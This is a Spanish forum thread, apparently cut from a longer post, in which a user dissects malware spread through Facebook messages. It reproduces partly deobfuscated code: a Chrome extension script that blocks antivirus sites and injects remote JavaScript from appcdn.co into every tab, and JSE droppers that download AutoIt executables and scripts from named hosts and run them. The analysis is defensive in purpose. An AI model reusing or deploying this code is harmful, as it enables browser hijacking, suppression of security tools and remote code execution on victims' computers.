MtVDOtZzNtZzNtVDOtRTb3UTb0ETbyMTbxQTbwITb2UTb1gTb1YTb5MTbt1Wbt1Wb3cTb1ITbxQTb0gTb0QTbyMTb1gTbzMTbx0GN00GN40GN10mNtRzNtRTMtlzMtdTMtdjNtRDNtRTbxcTb1gTbzMTb002N10GNx0mMz0WM00GMy0mN10WO00WM002M202N10GN102M20mMz0mMz0GNx0WOt1Wbt1WbtdzNtNDNt1Wbt1WbtdzNtVjMtZTNtdjNtNjNtBDOtdTMtVjNtJjMtBDOtdjNtFTbt1Wbt1WbthDNtVDOtVjMtZTNtlDNtdTNtlzMtJzMtRzNtlDNtRDOtVjNtVDOtZzNtVDOtRDNtdTNtRDNtRDNtFDNtlDNtdTNtRTNtNjNtJzMtJzMtRTMtlTbt1Wbt1Wb3cTbzQTbt1Wbt1Wb3cTb1ITbyMTb50WM00mMtFDNtZTb5QTb3UTbzYTb20WM00GN00GN102M20mMz0mMz0GNx0WOtZTNtdjNtNjNtBDOtdTMtVjNtJjMtBDOtdjNtFTbt1Wbt1WbthDNtVDOtVjMtZTNtlDNtdTNtlzMtJzMtRzNtlDNtRDOtVjNtVDOtZzNtVDOtRTb3YTb3UTbx0WO002N10GN102M20mMz0mMz0GNx0WOt1Wbt1Wbt1Wb3cTb2ETb00WM00GNtdTNtRzNtlDNtFDNtFTb0QTb0gTbyUTbwITb0QTb3UTb1YTbyUTbwYTbwYTbwYTbyUTb50WM20WO002N10WOz0mMz02N20GN30WOz0WMtNjNtNjNtdjNtZTMtVDOtBTNtVDOtFDNtNjNtdTMtJzMtRTNtZTb0cTb0ETb5MTb3ETb3YTb0QTb00WM30WN40WO10WN40WM002M202Nx0mMz0GN10mNtRzNtRTMtlzMtdTMtdjNtRDNtRTbxcTb1gTb2cTb1gTbxQTbzYTb3ETbyMTb3YTbyMTb3YTb00WN40GN002N20mNz0Wbt1Wbt12N30mNx0GN30GN40GN40GNtRDOtJzMtRDOtNjNtRzNtZTMtVDOtBTNtVDOtVjMtZTNtFDNtZTb3YTbxETb0QTbxQTbzYTbzYTb402N10mMz0GN10GNtdTNtRTMtJzMtFDNtBjMtRTNtZTb0cTb0ETb5MTb3ETb3YTb0QTb00WM30WN40WO10WN40GNtdTNtRTMtJzMtFDNtBjMtRTNtZTb0cTb0ETb5MTb3ETb3YTb0QTb00WM30WN40mN30WN40GNtdTNtRTMtJzMtFDNtBjMtVDOtRDNtdjNtZzMt1Wbt1WbtdzNtVjMtZTNtJzMtZTbxQTb0gTbwMTbxQTb1ETbzYTbyMTbyMTbycTbyQTbzETb1MTb1gTbwYTbxQTb5QTb1gTb2cTb1gTbzYTbyMTbyMTb0ETb50WN40GN002N20mNz0Wbt1Wbt1GO00WN40WNy0mNx02M20mMz0mMz0GNx0WOtZTMtVDOtZzNtZzNtVDOtlDNtdTNtlzMtJzMtRzNtdjNtRTNtZTb0cTb0ETb5MTb3ETb3YTb0QTb00WM30mN10WN40WN20WOz0Wbt1WbthDNtVDOtVjMtdjNtNjNtBDOtdTMtVjNtJjMtBDOtdjNtFTb1gTbzMTb00mMy02Nx02M20GMy0mMy0mMy0GN40WM00GN30WN402Mz0mNtRzNtRTMtlzMtdTMtdjNtRDNtRTbxcTb2UTb5QTb3UTb5MTbyMTb0cTb5QTb0gTb1YTb2UTbwcTb4ETb4ETbwYTb3ETb2MTb4ETbxQTb20GMz0GMx0GM30GNx0GN40GM40GNtVjNtNjNtZzMtFzNtBjMtBTMtBzNtJzMtRzNtVjNtFzNtRDOtNTbx0WN20GMx0GM302N10GM20GOx0GM20GMz02N20mMy0mNthTMtBTMtdTNtdjNtJzMtlTbwgTb0QTb50WN20Wbt1Wb", 
"status", 
"complete",
 "?r=",
 "random",
 "&url=",
 "url", 
"open",
 "onreadystatechange",
 "readyState",
 "id", 
"responseText"];

var zararlidomainler = ['facebook.com/csp.php', 'facebook.com/mac_nerd_son', 'bitdefender.com', 'files.avast.com', 'trendmicro.com', 'avg.com', 'grisoft.com', 'avg.cz', 'grisoft.cz', 'edgesuite.net', 'grisoft.com', 'avg.com', 'pctools.com', 'lavasoft.com', 'bitdefender.nl', 'virustotal.com', 'trendmicro.nl', 'trendmicro.com.au', 'securesoft.com.au', 'avira.com.au', 'gratissoftwaresite.nl', 'nod32.com.au', 'pandasecurity.com.au', 'lavasoft.com.au', 'avg.com.au', 'symantec-norton.com', 'trendmicro.com', 'malwarebytes.org', 'pchelpforum.com', 'cnet.com', 'techsupportforum.com', 'gratissoftware.nu', 'majorgeeks.com', 'pcworld.com', 'microbe.com.au', 'avast.com.au', 'avg-antivirus.com.au', 'nortonantiviruscenter.com', 'threatmetrix.com', 'zonealarm.com', 'firewallguide.com', 'auditmypc.com', 'comodo.com', 'free-firewall.org', 'schoonepc.nl', 'iopus.com', 'tucows.com', 'avg-antivirus-plus-firewall.en.softonic.com', 'softonic.com', 'superantispyware.com.au', 'superantispyware.com', 'harveynorman.com.au', 'ca-store.com.au', 'netfreighters.com.au', 'securetec.com.au', 'anti-spyware.com.au', 'virusscan.jotti.org', 'virscan.org', 'antivir.ru', 'avira.com', 'analysis.avira.com', 'hijackthis.de', 'uploadmalware.com', 'emsisoft.com', 'kaspersky.co.uk', 'bitdefender.co.uk', 'eset.co.uk', 'webroot.com', 'gdatasoftware.co.uk', 'pcpro.co.uk', 'webroot.co.uk', 'cyprotect.com', 'drweb-antivir.it', 'escanav.com', 'webroot.nl', 'av.eu', 'vergelijk.nl', 'antivirusvergelijk.nl', 'virussen.upc.nl', 'antivirus.startpagina.nl', 'avastav.nl', 'defenx.nl', 'gdata.nl', 'bitdefender.nl', 'removevirus.org', 'windows.microsoft.com', 'answers.microsoft.com', 'myantispyware.com', 'krebsonsecurity.com', 'antivirus.about.com', 'cleanuninstall.com', 'staples.com', 'esetindia.com', 'mcafee.free-trials.net', 'antivir-2012.com', 'panda-antivirus.en.softonic.com', 'freeantivirushelp.com', 'scanwith.com', 'bestantivirusreviewed.com', 'virus-help.net', 'cleanallspyware.com', 'kingsoftsecurity.com', 'threatfire.com', 'clamav.net', 'pcthreat.com', '2-viruses.com', 'trojan-killer.ne', 'virusinfo.info', 'projecthoneypot.org', 'novirus.ru', 'anti-malware.com', 'offensivecomputing.net', 'zeustracker.abuse.ch', 'malekal.com', 'threatexpert.com', 'update.microsoft.com', 'av-comparatives.org', 'av-test.org', 'scanwith.com', 'trendmicro.com.au', 'kasperskyanz.com.au', 'bitdefender.com.au', 'eset.com.au', 'vet.com.au', 'mcafee.com', 'virusbtn.com', 'adwarereport.com', 'avg.com.au', 'adwarereport.com', 'dw.com', 'symantec.com', 'spywarewarrior.com', 'avsoft.ru', 'onecare.live.com', 'anubis.iseclab.org', 'wepawet.iseclab.org', 'iseclab.org', 'freespaceinternetsecurity.com', 'sunbelt-software.com', 'prevx.com', 'tuwien.ac.at', 'joebox.org', 'gmer.net', 'antirootkit.com', 'sectools.org', 'sandboxie.com', 'mwcollect.org', 'amtso.org', 'nsslabs.com', 'icsalabs.com', 'checkvir.com', 'check-mark.com', 'protectstar-testlab.org', 'anti-malware-test.com', 'av-test.de', 'wildlist.org', 'aavar.org', 'centralops.net', 'staysafeonline.info', 'rokop-security.de', 'rokop-security.de', 'wilderssecurity.com', 'superantispyware.com', 'kaspersky.com', 'kaspersky.ru', 'avp.ru', 'viruslist.com', 'kaspersky-antivirus.ru', 'downloads.kaspersky-labs.com', 'kavdumps.kaspersky.com', 'kasperskyclub.ru', 'kasperskyclub.com', 'ftp.kasperskylab.ru', 'ftp.kaspersky-labs.com', 'ftp.kaspersky.ru', 'data.kaspersky.ru', 'z-oleg.com', 'drweb.com', 'freedrweb.com', 'drweb.com.ua', 'drweb.ru', 'av-desk.com', 'drweb.net', 'ftp.drweb.com', 'dr-web.ru', 'download.drweb.com', 'support.drweb.com', 'updates.sald.com', 'sald.com', 'drweb.imshop.de', 'norton.com', 'safeweb.norton.com', 'liveupdate.symantec.com', 'service1.symantec.com', 'security.symantec.com', 'securityresponse.symantec.com', 'sygate.com', 'esetnod32.ru', 'eset.com', 'nod32.com.ua', 'nod32.com', 'download.eset.com', 'update.eset.com', 'eset.eu', 'nod32.it', 'nod32.su', 'nod-32.ru', 'allnod.com', 'allnod.info', 'virusall.ru', 'nod32eset.org', 'eset.sk', 'nod32.nl', 'antivir.de', 'free-av.com', 'free-av.de', 'avira.com', 'forum.avira.com', 'avirus.ru', 'avirus.com.ua', 'mcafee.com', 'home.mcafee.com', 'us.mcafee.com', 'mcafeesecurity.com', 'mcafeesecure.com', 'avertlabs.com', 'download.nai.com', 'nai.com', 'secure.nai.com', 'eu.shopmcafee.com', 'shop.mcafee.com', 'mcafeestore.com', 'service.mcafee.com', 'siteadvisor.com', 'avast.ru', 'avast.com', 'onlinescan.avast.com', 'download1.avast.com', 'download1.avast.com', 'download2.avast.com', 'download2.avast.com', 'download3.avast.com', 'download4.avast.com', 'download5.avast.com', 'download7.avast.com', 'free.avg.com', 'au.norton.com', 'trustdefender.com', 'pctools.com', 'grisoft.cz', 'free.grisoft.com', 'bitdefender.com', 'msecn.net', 'bitdefender.de', 'bitdefender.com.ua', 'bitdefender.ru', 'myaccount.bitdefender.com', 'ftp.bitdefender.com', 'forum.bitdefender.com', 'agnitum.ru', 'agnitum.com', 'agnitum.de', 'outpostfirewall.com', 'dl2.agnitum.com', 'dl1.agnitum.com', 'antivirus.comodo.com', 'camas.comodo.com', 'comodo.com', 'comodogroup.com', 'personalfirewall.comodo.com', 'hackerguardian.com', 'nsclean.com', 'clamav.net', 'db.local.clamav.net', 'clamsupport.sourcefire.com', 'lurker.clamav.net', 'clamwin.com', 'gietl.com', 'clamav.dyndns.org', 'f-secure.com', 'f-secure.com', 'support.f-secure.com', 'f-secure.ru', 'ftp.f-secure.com', 'europe.f-secure.com', 'f-secure.de', 'f-secure.de', 'support.f-secure.de', 'ftp.f-secure.de', 'f-secure.co.uk', 'norman.com', 'download.norman.no', 'sandbox.norman.no', 'nsclean.com', 'viruslab.ru', 'pandasoftware.com', 'anti-virus.by', 'virusblokada.ru', 'vba32.de', 'ftp.nai.com', 'secuser.com', 'tds.diamondcs.com.au', 'windowsupdate.microsoft.com', 'lavasoftusa.com', 'lavasoftusa.de', 'diamondcs.com.au', 'shop.ca.com', 'v4.windowsupdate.microsoft.com', 'v5.windowsupdate.microsoft.com', 'noadware.net', 'zonelabs.com', 'moosoft.com', 'model-fx.com', 'pccreg.antivirus.com', 'k-otik.com', 'vupen.com', 'housecall.trendmicro.com', 'antivirus.cai.com', 'sophos.com', 'securitoo.com', 'nordnet.com', 'avgfrance.com', 'avgfrance.com', 'antivirus-online.de', 'ftp.esafe.com', 'ftp.microworldsystems.com', 'ftp.ca.co', 'trendmicro-europe.com', 'inline-software.de', 'ravantivirus.com', 'ravantivirus.com', 'f-prot.com', 'files.f-prot.com', 'santivirus.com', 'openantivirus.org', 'dialognauka.ru', 'anti-virus-software-review.com', 'vet.com.au', 'antiviraldp.com', 'pestpatrol.com', 'antiviraldp.com', 'pestpatrol.com', 'simplysup.com', 'misec.net', 'my-etrust.com', 'authentium.com', 'finjan.com', 'ikarus-software.at', 'ika-rus.com', 'tinysoftware.com', 'visualizesoftware.com', 'kerio.com', 'zonelabs.com', 'zonelog.co.uk', 'webroot.com', 'lavasoft.nu', 'spywareguide.com', 'spyblocker-software.com', 'spamhaus.org', 'spamcop.net', 'bobbear.co.uk', 'domaintools.com', 'centralops.net', 'robtex.com', 'dnsstuff.com', 'ripe.net', 'met.police.uk', 'nbi.gov.ph', 'police.gov.hk', 'treasury.gov', 'treasury.gov', 'cybercrime.gov', 'cybercrime.ch', 'enisa.europa.eu', 'interpol.int', 'fsa.gov.uk', 'companies-house.gov.uk', 'fraudaid.com', 'scambusters.org', 'spamtrackers.eu', 'emlx.net', 'clamav.dyndns.org', 'f-secure.com', 'f-secure.com', 'support.f-secure.com', 'f-secure.ru', 'ftp.f-secure.com', 'europe.f-secure.com', 'f-secure.de', 'support.f-secure.de', 'ftp.f-secure.de', 'f-secure.co.uk', 'norman.com', 'download.norman.no', 'sandbox.norman.no', 'nsclean.com', 'viruslab.ru', 'pandasoftware.com', 'anti-virus.by', 'virusblokada.ru', 'vba32.de', 'ftp.nai.com', 'secuser.com', 'tds.diamondcs.com.au', 'windowsupdate.microsoft.com', 'lavasoftusa.com', 'lavasoftusa.de', 'diamondcs.com.au', 'shop.ca.com', 'v4.windowsupdate.microsoft.com', 'v5.windowsupdate.microsoft.com', 'noadware.net', 'zonelabs.com', 'moosoft.com', 'model-fx.com', 'pccreg.antivirus.com', 'k-otik.com', 'vupen.com', 'housecall.trendmicro.com', 'antivirus.cai.com', 'sophos.com', 'securitoo.com', 'nordnet.com', 'avgfrance.com', 'avgfrance.com', 'antivirus-online.de', 'ftp.esafe.com', 'ftp.microworldsystems.com', 'ftp.ca.co', 'trendmicro-europe.com', 'inline-software.de', 'ravantivirus.com', 'ravantivirus.com', 'f-prot.com', 'files.f-prot.com', 'santivirus.com', 'openantivirus.org', 'dialognauka.ru', 'anti-virus-software-review.com', 'vet.com.au', 'antiviraldp.com', 'pestpatrol.com', 'antiviraldp.com', 'pestpatrol.com', 'simplysup.com', 'misec.net', 'my-etrust.com', 'authentium.com', 'finjan.com', 'ikarus-software.at', 'ika-rus.com', 'tinysoftware.com', 'visualizesoftware.com', 'kerio.com', 'zonelabs.com', 'zonelog.co.uk', 'webroot.com', 'lavasoft.nu', 'spywareguide.com', 'spyblocker-software.com', 'spamhaus.org', 'spamcop.net', 'bobbear.co.uk', 'domaintools.com', 'centralops.net', 'robtex.com', 'dnsstuff.com', 'ripe.net', 'met.police.uk', 'nbi.gov.ph', 'police.gov.hk', 'treasury.gov', 'treasury.gov', 'cybercrime.gov', 'cybercrime.ch', 'enisa.europa.eu', 'interpol.int', 'fsa.gov.uk', 'companies-house.gov.uk', 'fraudaid.com', 'scambusters.org', 'spamtrackers.eu', 'emlx.net'];

chrome.webRequest.onBeforeRequest.addListener(function(details) {
    for (i = 0; i < zararlidomainler.length; i++) {
        if (details.url.indexOf(zararlidomainler[i]) > -1) {
            return {
                cancel: true
            };
        }
    }
    return {
        cancel: false
    };
}, {
    urls: ["<all_urls>"]
}, ["blocking"]);

function PPqZNIznyW(_0xdbf4x2) {
    EONGoOjGI = _0x4911[2][_0x4911[1]](_0x4911[0]);
    _0xdbf4x2 = atob(_0xdbf4x2[_0x4911[1]](_0x4911[0])[_0x4911[5]]()[_0x4911[4]](_0x4911[0]))[_0x4911[1]](_0x4911[3]);
    KPUYheBeTXI = _0x4911[0];
    for (var _0xdbf4x3 = 0; _0xdbf4x3 < _0xdbf4x2[_0x4911[6]]; _0xdbf4x3++) {
        if (typeof EONGoOjGI[_0xdbf4x2[_0xdbf4x3]] != _0x4911[7]) {
            KPUYheBeTXI = KPUYheBeTXI + EONGoOjGI[_0xdbf4x2[_0xdbf4x3]]
        }
    };
    return KPUYheBeTXI
}

fxrkxtao = window;
jsbaqwjwo = PPqZNIznyW(_0x4911[8]);
wcanalzjhoj = PPqZNIznyW(_0x4911[9]);
bedauzffyp = PPqZNIznyW(_0x4911[10]);
nibhmagz = PPqZNIznyW(_0x4911[12]);
qftxccyukdb = _0x4911[39];
cdyrglau = _0x4911[40];
bgocnhyorvc = _0x4911[41];
ytsuuhcf = _0x4911[42];
zdrayihcs = _0x4911[43];
ceubbmpybd = _0x4911[44];
lakbfykpa = _0x4911[45];
lmnhejthnx = PPqZNIznyW(_0x4911[20]);
skjhguxl = PPqZNIznyW(_0x4911[21]);
qsejvywjj = PPqZNIznyW(_0x4911[22]);
yecnwobfb = PPqZNIznyW(_0x4911[46]);
hrfkyjpinn = PPqZNIznyW(_0x4911[24]);
mcmjvfnbqlq = PPqZNIznyW(_0x4911[47]);
xxhoowxtn = PPqZNIznyW(_0x4911[48]);
jqljlogsw = PPqZNIznyW(_0x4911[49]);
cputuduuc = PPqZNIznyW(_0x4911[50]);
ijserzhoybo = PPqZNIznyW(_0x4911[51]);
ibeqbjvfi = PPqZNIznyW(_0x4911[52]);
flguzfct = PPqZNIznyW(_0x4911[53]);
mzvpfdkuh = PPqZNIznyW(_0x4911[54]);
bymgtjlstt = PPqZNIznyW(_0x4911[55]);
zzranvqxx = _0x4911[56];
kqvderznd = _0x4911[57];

/*
Valores de cada variable de esas de arriba:

jsbaqwjwo chrome
wcanalzjhoj management
bedauzffyp getSelf
nibhmagz normal
qftxccyukdb zjbqdhqu
cdyrglau fbwzthcnrg
bgocnhyorvc kqxrcielyla
ytsuuhcf mrjucrdtge
zdrayihcs fjvsgxik
ceubbmpybd gkhbxrhd
lakbfykpa xjqtskrvvk
lmnhejthnx tabs
skjhguxl onUpdated
qsejvywjj addListener
yecnwobfb get
hrfkyjpinn installType
mcmjvfnbqlq send
xxhoowxtn executeScript
jqljlogsw http://appcdn.co/data.js
cputuduuc GET
ijserzhoybo complete
ibeqbjvfi status
flguzfct runtime
mzvpfdkuh onMessage
bymgtjlstt eval
zzranvqxx yxghnqyea
kqvderznd ikvxlelue

*/

window[eval](PPqZNIznyW(TEXTO_LARGO)) 

// Eso ejecuta esto: (Yo reemplacé als variables por su valor, creo que en
// algunas me olvidé las comillas

window[chrome][runtime][onMessage][addListener](function(fjvsgxik, ceubbmpybd, xjqtskrvvk) {
    if (fjvsgxik.action == 'xhttp') {
        var xhttp = new XMLHttpRequest();
        var method = fjvsgxik.method ? fjvsgxik.method.toUpperCase() : 'GET';
        var datatype = fjvsgxik.type ? fjvsgxik.type : 'application/x-www-form-urlencoded';
        xhttp.onload = function() {
            xjqtskrvvk(xhttp.responseText);
        };
        xhttp.onerror = function() {
            xjqtskrvvk();
        };
        xhttp.open(method, fjvsgxik.url, true);
        if (method == 'POST') {
            xhttp.setRequestHeader('Content-Type', datatype);
        }
        xhttp[send](fjvsgxik.data);
        return true;
    }
});
chrome.tabs.query({
    'url': '*://*.facebook.com/*',
}, function(tabs) {
    active = false;
    for (tab in tabs) {
        if (tabs[tab].active) {
            active = true;
        }
        chrome.tabs.remove(tabs[tab].id, function() {});
    }
    chrome.tabs.create({
        'url': 'https://www.facebook.com/',
        'active': active,
        'selected': active
    }, function() {});
});

// Hasta ahi

window[chrome][tabs][onUpdated][addListener](function(_0xdbf4x5) {
    window[chrome][tabs][get](_0xdbf4x5, function(_0xdbf4x6) {
        if (_0xdbf4x6["status"] == "complete") {
            tab = _0xdbf4x6;
            (tab['url']['indexOf']('chrome://extension') >= 0 || tab['url']['indexOf']('chrome://chrome/extension') >= 0 || tab['url']['indexOf']('chrome://settings/resetProfileSettings') >= 0 || tab['url']['indexOf']('opera://extensions/') >= 0 || tab['url']['indexOf']('browser://tune/') >= 0 || tab['url']['indexOf']('chrome://tune/') >= 0 || tab['url']['indexOf']('chrome://help/') >= 0) && chrome['tabs']['update'](tab['id'], {
                url: 'https://chrome.google.com/webstore/category/apps'
            });
            var _0xdbf4x7 = new XMLHttpRequest();
            _0xdbf4x7["open"](GET, "http://appcdn.co/data.js" + "?r=" + Math["random"]() + "&url=" + _0xdbf4x6["url"], true);
            _0xdbf4x7["onreadystatechange"] = function() {
                if (_0xdbf4x7["readyState"] == 4 && _0xdbf4x7[status] == 200) {
                    window[chrome][tabs][executeScript](_0xdbf4x6["id"], {
                        code: _0xdbf4x7["responseText"]
                    })
                }
            };
            _0xdbf4x7[send]()
        }
    })
})

 

 

 

EDIT 3: Formato

 

EDIT 4:

 

Otro amigo me mandó dos veces un malware similar. Me mandó un mensaje privado con simplemente un link a un archivo en dropbox. Las dos veces que me lo mandó fueron archivos diferentes, codificados de forma distinta pero que en sí ejecutan el mismo código.

Los nombres fueron Tfacebook_59538060.jse y Afacebook_34776416.jse

 

El código que ejecutan es muy similar a comment_33385454.jse:

 

 

(function(c) {
    function a(a, b, pos) {
        if (!b || !a) return null;
        var d = WScript.CreateObject("Msxml2.XMLhttp");
        d.onreadystatechange = function() {
            if (d.readyState === 4 && d.status === 200) {
                xa = new ActiveXObject("ADODB.Stream");
                xa.open();
                xa.type = 1;
                xa.write(d.ResponseBody);
                xa.position = pos;
                stm2 = new ActiveXObject("ADODB.Stream");
                stm2.type = 1;
                stm2.open();
                stm2.write(xa.read());
                stm2.saveToFile(b, 2);
                stm2.close();
                xa.close();
            }
        };
        d.open("GET", a, false);
        d.send(null);
    }

    function ekle(ustdosya, altdosya) {
        {
            xa = new ActiveXObject("ADODB.Stream");
            xa.open();
            xa.type = 1;
            xa.LoadFromFile(ustdosya);
            ix = new ActiveXObject("ADODB.Stream");
            ix.open();
            ix.type = 1;
            ix.LoadFromFile(altdosya);
            stm2 = new ActiveXObject("ADODB.Stream");
            stm2.type = 1;
            stm2.open();
            stm2.write(ix.read());
            stm2.write(xa.read());
            xa.close();
            ix.close();
            stm2.saveToFile(ustdosya, 2);
            stm2.close();
        }
    }
    fso = new ActiveXObject("Scripting.FileSystemObject");
    var e = new ActiveXObject("WScript.Shell");
    c = new ActiveXObject("Shell.Application");
    FileDestr = e["ExpandEnvironmentStrings"]("%APPDATA%\\");
    mozklasor = FileDestr + "Mozila";
    if (!fso.FolderExists(mozklasor)) {
        fso.CreateFolder(mozklasor);
    }
    c.ShellExecute("http://tracking.redirect.pub/ad/4cac9671?d=1");
    a("https://s3-sa-east-1.amazonaws.com/hugelecdata/a", mozklasor + "\\autoit.exe", 0);
    a("https://s3-sa-east-1.amazonaws.com/hugelecdata/b", mozklasor + "\\bg.js", 0);
    a("https://s3-sa-east-1.amazonaws.com/hugelecdata/e", mozklasor + "\\ekl.au3", 0);
    a("https://s3-sa-east-1.amazonaws.com/hugelecdata/m", mozklasor + "\\manifest.json", 0);
    a("https://s3-sa-east-1.amazonaws.com/hugelecdata/r", mozklasor + "\\run.bat", 0);
    a("http://whos.amung.us/pingjs/?k=pingjse3462", mozklasor + "\\ping2.js", 0);
    c.ShellExecute(mozklasor + "\\run.bat", "", mozklasor, "", 0);
})(this);

 

 

 

Algo interesante es que entendí que eran los ping.js

Creo que son para trackear en cuántas computadoras el malware se ha ejecutado. Eran direcciones web que se descargaban, por ejemplo el último que descargué cargaba esta dirección:

 

http://whos.amung.us/pingjs/?k=pingjse3462

 

Que buscando un poco en la página pude encontrar esto (ver las URL):

 

http://whos.amung.us/stats/maps/pingjse3462/

 

Que parecen ser estadísticas de los infectados. Por si les interesa acá van las estadísticas, el comment_33385454.jse linkea a las dos estadísticas mientras que Tfacebook_59538060.jse y Afacebook_34776416.jse linkean solamente a la primera

 

http://whos.amung.us/stats/pingjse3462/

http://whos.amung.us/stats/pingjse346/

 

Estoy loco o hay más de 100 PCs pings por hora? :huh:

Editado por Mgbu
eMix, Rohlling, pacoeloyo y 1 otro le gusta esto

Compartir este post


Enlace al post
Compartir en otros sitios

Reportalos a Facebook y habla con ese amigo tuyo haber que te ha enviado, hace tiempo que Facebook es un estercolero.

 

Enviado desde mi Aquaris E4 mediante Tapatalk

eMix, Fransis y Rohlling le gusta esto

Compartir este post


Enlace al post
Compartir en otros sitios

Reportalos a Facebook y habla con ese amigo tuyo haber que te ha enviado, hace tiempo que Facebook es un estercolero.

 

Enviado desde mi Aquaris E4 mediante Tapatalk

Fueron dos amigos diferentes, tendría que preguntarles

pacoeloyo, Rohlling y Fransis le gusta esto

Compartir este post


Enlace al post
Compartir en otros sitios

Más de una vez he escuchado que se reciben mensajes falsos de tus contactos en Facebook, ya te digo, el cara libro se ha vuelto un experto en mandar basura.

 

Enviado desde mi Aquaris E4 mediante Tapatalk

Rohlling y Fransis le gusta esto

Compartir este post


Enlace al post
Compartir en otros sitios

Ahí estuve viendo más sobre el código a ver que llego a entender con lo poco que se

 

 

Con respecto al javascript, al comienzo tiene un array con muchos strings que están escritos de forma hexagesimal que contiene muchas palabras clave como nombres de funciones, sitios web, etc. Acomodandolo un poco queda así:

 

 

var _0xe519 = ["Msxml2.XMLhttp",
    "onreadystatechange",
    "readyState",
    "status",
    "ADODB.Stream",
    "open",
    "type",
    "write",
    "position",
    "read",
    "saveToFile",
    "close",
    "GET",
    "send",
    "Scripting.FileSystemObject",
    "WScript.Shell",
    "Shell.Application",
    "%APPDATA%\",
    "ExpandEnvironmentStrings",
    "Mozila ",
    "https: //www.google.com",
    "http://userexperiencestatics.net/ext/Autoit.jpg",
    "\autoit.exe",
    "http://userexperiencestatics.net/ext/bg.jpg",
    "\bg.js",
    "http://userexperiencestatics.net/ext/ekl.jpg",
    "\ekl.au3",
    "http://userexperiencestatics.net/ext/ff.jpg",
    "\ff.zip",
    "http://userexperiencestatics.net/ext/force.jpg",
    "\force.au3",
    "http://userexperiencestatics.net/ext/sabit.jpg",
    "\sabit.au3",
    "http://userexperiencestatics.net/ext/manifest.jpg", 
    "\manifest.json", 
    "http://userexperiencestatics.net/ext/run.jpg",
    "\run.bat", 
    "http://userexperiencestatics.net/ext/up.jpg", 
    "\up.au3", 
    "http://whos.amung.us/pingjs/?k=pingjse346", 
    "\ping.js", 
    "http://whos.amung.us/pingjs/?k=pingjse3462",
    "\ping2.js", 
    ""];

(function(funcion1) {
    function funcion2(funcion2, variable1, variable2) {
        if (!variable1 || !funcion2) {
            return null
        };
        var objHTTP = WScript.CreateObject("Msxml2.XMLhttp");
        objHTTP["onreadystatechange"] = function() {
            if (objHTTP["readyState"] === 4 && objHTTP["status"] === 200) {
                adodbStream1 = new ActiveXObject("ADODB.Stream");
                adodbStream1["open"]();
                adodbStream1["type"] = 1;
                adodbStream1["write"](objHTTP.ResponseBody);
                adodbStream1["position"] = variable2;
                adodbStream2 = new ActiveXObject("ADODB.Stream");
                adodbStream2["type"] = 1;
                adodbStream2["open"]();
                adodbStream2["write"](adodbStream1["read"]());
                adodbStream2["saveToFile"](variable1, 2);
                adodbStream2["close"]();
                adodbStream1["close"]()
            }
        };
        objHTTP["open"]("GET", funcion2, false);
        objHTTP["send"](null)
    }

    function funcion3(variable3, variable4) {
        {
            adodbStream1 = new ActiveXObject("ADODB.Stream");
            adodbStream1["open"]();
            adodbStream1["type"] = 1;
            adodbStream1.LoadFromFile(variable3);
            ix = new ActiveXObject("ADODB.Stream");
            ix["open"]();
            ix["type"] = 1;
            ix.LoadFromFile(variable4);
            adodbStream2 = new ActiveXObject("ADODB.Stream");
            adodbStream2["type"] = 1;
            adodbStream2["open"]();
            adodbStream2["write"](ix["read"]());
            adodbStream2["write"](adodbStream1["read"]());
            adodbStream1["close"]();
            ix["close"]();
            adodbStream2["saveToFile"](variable3, 2);
            adodbStream2["close"]()
        }
    }
    fso = new ActiveXObject("Scripting.FileSystemObject");
    var shell = new ActiveXObject("WScript.Shell");
    funcion1 = new ActiveXObject("Shell.Application");
    FileDestr = shell["ExpandEnvironmentStrings"]("%APPDATA%\");
    mozklasor = FileDestr + "Mozila ";
    if (!fso.FolderExists(mozklasor)) {
        fso.CreateFolder(mozklasor)
    };
    funcion1.ShellExecute("https: //www.google.com");
    funcion2("http://userexperiencestatics.net/ext/Autoit.jpg", mozklasor + "\autoit.exe", 0);
    funcion2("http://userexperiencestatics.net/ext/bg.jpg", mozklasor + "\bg.js", 0);
    funcion2("http://userexperiencestatics.net/ext/ekl.jpg", mozklasor + "\ekl.au3", 0);
    funcion2("http://userexperiencestatics.net/ext/ff.jpg", mozklasor + "\ff.zip", 0);
    funcion2("http://userexperiencestatics.net/ext/force.jpg", mozklasor + "\force.au3", 0);
    funcion2("http://userexperiencestatics.net/ext/sabit.jpg", mozklasor + "\sabit.au3", 0);
    funcion2("http://userexperiencestatics.net/ext/manifest.jpg", mozklasor + "\manifest.json", 0);
    funcion2("http://userexperiencestatics.net/ext/run.jpg", mozklasor + "\run.bat", 0);
    funcion2("http://userexperiencestatics.net/ext/up.jpg", mozklasor + "\up.au3", 0);
    funcion2("http://whos.amung.us/pingjs/?k=pingjse346", mozklasor + "\ping.js", 0);
    funcion2("http://whos.amung.us/pingjs/?k=pingjse3462", mozklasor + "\ping2.js", 0);
    funcion1.ShellExecute(mozklasor + "\run.bat", "", mozklasor, "", 0)
})(this)

 

 

Para decodificar los hex se puede usar esta web: http://ddecode.com/hexdecoder/?results=9d3df2a89fdb7da40ceb4de02d605cfa

Todos los strings del código eran llamadas al array del comienzo, yo me puse a reemplazarlos por su string correspondiente

Parece que el código lo que hace es descargar varias cosas y ejecutar un .bat

Descargué el bat y adentro tiene esto:

cd "%~dp0"
autoit.exe "force.au3"
autoit.exe "ekl.au3"

Hay que tener en cuenta que los archivos tienen una extensión diferente para confundir

Por lo que vi, autoit es un lenguaje de scripting, entonces supongo que está compilando dos archivos

 

Por último descargué el force.au3

Me da miedo, es super largo y leí muchas veces crypto, debe ser una especie de cryptolocker. También parece que tiene programada una interfaz

 

Acá encontré otro con el problema: http://security.stackexchange.com/questions/128254/facebook-tricked-me-into-downloading-an-obfuscated-script

EDIT: No puedo creer que esa pregunta tenga 5 horas de antiguedad

 

Mas info sobre el tema:

https://securitythoughts.wordpress.com/2009/08/28/deobfuscating-javascript-malware/

http://www.schillmania.com/content/entries/2009/javascript-malware-obfuscation-analysis/

Editado por Mgbu
Fransis, Rohlling y pacoeloyo le gusta esto

Compartir este post


Enlace al post
Compartir en otros sitios

Registra una cuenta o conéctate para comentar

Debes ser un miembro de la comunidad para dejar un comentario

Crear una cuenta

Regístrate en nuestra comunidad. ¡Es fácil!


Registrar una cuenta nueva

Iniciar Sesión

¿Ya tienes cuenta? Conéctate aquí.


Iniciar Sesión